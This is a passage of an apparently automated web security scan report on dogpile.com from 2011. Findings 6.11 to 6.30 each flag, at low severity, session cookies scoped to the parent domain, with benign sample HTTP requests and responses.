Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile/ws/faq/rfcid=416/rfcp=left/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

DomainSession=TransactionId=ba3967d21c5c40fc92fdc16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=530d17a155f848679bfdc16a3af0cb01&ActionId=f1bd779c38af4c89afa5c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:34:20 GMT; path=/
DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:14:20 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 17:14:20 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

6.11. http://www.dogpile.com/dogpile/ws/redir/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile/ws/redir/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

DomainSession=TransactionId=367df53625864920a346c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=09595e0bb31848b5a194c16a3af0cb01&ActionId=0bca44db8e72477aac9fc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:17:46 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:57:46 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:57:46 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile/ws/redir/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: http://www.dogpile.com/dogpile/ws/index/qcat=Web/qcoll=Relevance/rfcid=0/rfcp=0/padv=/_iceUrlFlag=11?_IceUrl=true
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=367df53625864920a346c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=09595e0bb31848b5a194c16a3af0cb01&ActionId=0bca44db8e72477aac9fc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:17:46 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:57:46 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:57:46 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:57:46 GMT
Connection: close
Content-Length: 230

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.dogpile.com/dogpile/ws/index/qcat=Web/qcoll=Relevance/rfcid=0/rfcp=0/padv=/_iceUrlFlag=11?_IceUrl=true">he
...[SNIP]...

6.12. http://www.dogpile.com/dogpile/ws/results/Web/april%20fools%20day%20pranks/1/42/Seasonal/Relevance/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile/ws/results/Web/april%20fools%20day%20pranks/1/42/Seasonal/Relevance/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=2f68f4b83d774f748c89c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:17:42 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:57:42 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:57:42 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile/ws/results/Web/april%20fools%20day%20pranks/1/42/Seasonal/Relevance/ HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

6.13. http://www.dogpile.com/dogpile_other/ws/about/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/about/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=c7d0fe76335d40769068c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:05 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:05 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:05 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/about/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

6.14. http://www.dogpile.com/dogpile_other/ws/about/rfcid=1245/rfcp=left/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/about/rfcid=1245/rfcp=left/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=0d323fe3be73453a893dc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:24 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:24 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:24 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/about/rfcid=1245/rfcp=left/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

6.15. http://www.dogpile.com/dogpile_other/ws/aboutArfie/rfcid=1385/rfcp=left/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/aboutArfie/rfcid=1385/rfcp=left/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=7bf15bbd815545118e35c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:26 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:26 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:26 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/aboutArfie/rfcid=1385/rfcp=left/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

6.16. http://www.dogpile.com/dogpile_other/ws/aboutresults/rfcid=1386/rfcp=left/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/aboutresults/rfcid=1386/rfcp=left/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=d276184e64f54d5b98bfc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:33 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:33 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:33 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/aboutresults/rfcid=1386/rfcp=left/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

6.17. http://www.dogpile.com/dogpile_other/ws/bookmark/bwr=ffchrm/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/bookmark/bwr=ffchrm/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=6f001cc080a04397bd88c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:15 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:15 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:15 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/bookmark/bwr=ffchrm/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

6.18. http://www.dogpile.com/dogpile_other/ws/bookmark/qcat=Images/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/bookmark/qcat=Images/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=ddb977a118474d1b9a72c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:09 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:09 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:09 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/bookmark/qcat=Images/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

6.19. http://www.dogpile.com/dogpile_other/ws/bookmark/qcat=News/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/bookmark/qcat=News/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=3d97c313d94145899eeac16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:15 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:15 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:15 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/bookmark/qcat=News/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

6.20. http://www.dogpile.com/dogpile_other/ws/bookmark/qcat=Video/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/bookmark/qcat=Video/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=6bbbb232f4e94914b016c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:17:54 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:57:54 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:57:54 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/bookmark/qcat=Video/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

6.21. http://www.dogpile.com/dogpile_other/ws/bookmark/qcat=Web/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/bookmark/qcat=Web/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=f85c1be494fd483ab40dc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:08 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:08 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:08 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/bookmark/qcat=Web/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

6.22. http://www.dogpile.com/dogpile_other/ws/bookmark/rfcid=1211/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/bookmark/rfcid=1211/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=f1e07d8163f9435e87f8c16a3af0cb01&ActionId=6ed1b194da28448c8f14c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:16:06 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:56:06 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:56:06 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/bookmark/rfcid=1211/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wsTemp=bigIP+3792213258.20480.0000+cacheId+ms20:1301676964559; wsRecent=Go+Daddy+CEO+Elephant,Web,Relevance,&MLB+Schedule,Web,Relevance,; wsViewRecent=1; DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=86d1546926784d5188d2c16a3af0cb01&ActionId=f1e07d8163f9435e87f8c16a3af0cb01&CookieDomain=.dogpile.com; DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:56:05 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com

Response

6.23. http://www.dogpile.com/dogpile_other/ws/categories/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/categories/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=670b820e86e94451af97c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:50 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:50 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:50 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/categories/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

6.24. http://www.dogpile.com/dogpile_other/ws/faq/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/faq/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=fabc047e90564b3caea8c16a3af0cb01&ActionId=c6139e801eee4175a160c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:16:15 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:56:15 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:56:15 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/faq/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
Referer: http://www.dogpile.com/dogpile_other/ws/index
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wsTemp=bigIP+3792213258.20480.0000+cacheId+ms20:1301676964559; wsRecent=Go+Daddy+CEO+Elephant,Web,Relevance,&MLB+Schedule,Web,Relevance,; wsViewRecent=1; DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=f1e07d8163f9435e87f8c16a3af0cb01&ActionId=859dec9ca7a74a60921ac16a3af0cb01&CookieDomain=.dogpile.com; DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:55:52 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com

Response

6.25. http://www.dogpile.com/dogpile_other/ws/faq/qcat=Images/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/faq/qcat=Images/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=302e17dfa32741629beac16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:30 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:30 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:30 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/faq/qcat=Images/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

6.26. http://www.dogpile.com/dogpile_other/ws/faq/qcat=News/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/faq/qcat=News/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=8d4c05bb90314dba98a5c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:32 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:32 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:32 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/faq/qcat=News/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

6.27. http://www.dogpile.com/dogpile_other/ws/faq/qcat=Video/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/faq/qcat=Video/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=5b79a7352bbb4726a052c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:31 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:31 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:31 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/faq/qcat=Video/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

6.28. http://www.dogpile.com/dogpile_other/ws/faq/qcat=Web/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/faq/qcat=Web/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=8e6e2554f391469f90c0c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:29 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:29 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:29 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/faq/qcat=Web/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

6.29. http://www.dogpile.com/dogpile_other/ws/faq/rfcid=416/rfcp=left/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/faq/rfcid=416/rfcp=left/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=d19fcdce85e94a39b89bc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:15 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:15 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:15 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/faq/rfcid=416/rfcp=left/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

6.30. http://www.dogpile.com/dogpile_other/ws/index previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/index

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

